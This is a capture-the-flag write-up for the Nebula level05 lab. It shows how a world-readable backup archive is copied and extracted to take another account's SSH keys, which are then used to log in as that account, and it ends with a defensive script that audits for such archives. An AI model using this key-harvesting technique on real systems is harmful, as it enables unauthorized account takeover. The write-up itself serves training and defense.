http://exploit-exercises.com/nebula/level05
From the description we get one hint: weak permissions. That is enough to solve this challenge easily.
First things first: navigate to /home/flag05 and try to list its contents:
$ cd /home/flag05
$ ls
$
That’s odd. It looks like it’s empty. Let’s try to list *all*:
$ ls -al /home/flag05
total 36
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05 36 2013-02-26 15:46 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 4096 2013-02-26 15:45 .cache
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 4096 2011-11-20 20:13 .ssh
Now, that’s better! It’s also easy to connect the initial hint with the permissions on .ssh and .backup. Let’s see what’s in .backup:
$ ls -al /home/flag05/.backup
total 12
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 ..
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
So we have a backup archive which everyone can read. Copy it to the home directory and see what’s in it:
$ cp /home/flag05/.backup/backup-19072011.tgz ~/
$ tar -zxvf ~/backup-19072011.tgz -C ~/
$ ls -al ~/
total 36
drwxr-x--- 4 level05 level05 4096 2013-02-26 15:46 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
-rw-rw-r-- 1 level05 level05 1826 2013-02-26 14:08 backup-19072011.tgz
-rw------- 1 level05 level05 705 2013-02-26 15:42 .bash_history
-rw-r--r-- 1 level05 level05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 level05 level05 4096 2013-02-26 13:48 .cache
-rw-r--r-- 1 level05 level05 675 2011-05-18 02:54 .profile
drwxr-xr-x 2 level05 level05 4096 2013-02-26 15:46 .ssh
We can see that we have obtained a .ssh directory containing SSH keys. Combining this with what we learned in the previous challenge, we can try connecting to localhost as the flag05 account:
$ ssh -l flag05 localhost
flag05@localhost$ getflag
You have successfully executed getflag on a target account
Easy-peasy.
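From the defender's side, the weakness in this level can be caught with an audit like the one below. It is an added example, not part of the original write-up; the sample tree and every file name except backup-19072011.tgz are constructed, and a tar with gzip support (-z) is assumed.

```shell
#!/bin/sh
# Added example: list gzip'd tar archives that "other" users can read and that
# contain SSH private keys or authorized_keys. Sample data below is constructed.

# Print each matching archive under directory $1. Members are listed, never extracted.
audit_archives() {
    find "$1" -type f \( -name '*.tgz' -o -name '*.tar.gz' \) -perm -004 2>/dev/null |
    while IFS= read -r archive; do
        if tar -tzf "$archive" 2>/dev/null |
            grep -Eq '(^|/)\.ssh/(id_[a-z0-9]+|authorized_keys)$'; then
            printf '%s\n' "$archive"
        fi
    done
}

# Build a constructed tree that mimics the .backup layout from the listing above.
make_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/flag05/.backup" "$root/src/.ssh" "$root/src2"
    echo 'constructed placeholder, not a real key' > "$root/src/.ssh/id_rsa"
    echo 'constructed placeholder' > "$root/src/.ssh/authorized_keys"
    echo 'notes' > "$root/src2/notes.txt"
    tar -czf "$root/flag05/.backup/backup-19072011.tgz" -C "$root/src" .ssh
    tar -czf "$root/flag05/.backup/notes.tgz" -C "$root/src2" notes.txt
    tar -czf "$root/flag05/.backup/private.tgz" -C "$root/src" .ssh
    chmod 755 "$root/flag05/.backup"
    chmod 664 "$root/flag05/.backup/backup-19072011.tgz"  # mode from the listing
    chmod 644 "$root/flag05/.backup/notes.tgz"            # readable, but no keys
    chmod 600 "$root/flag05/.backup/private.tgz"          # keys, but owner-only
    printf '%s\n' "$root"
}

sample=$(make_sample)
audit_archives "$sample"   # reports only backup-19072011.tgz
```

The check looks only at the archive's own mode bits. In the listing above, /home/flag05 is also traversable by group level05, so review who can reach the parent directories as well.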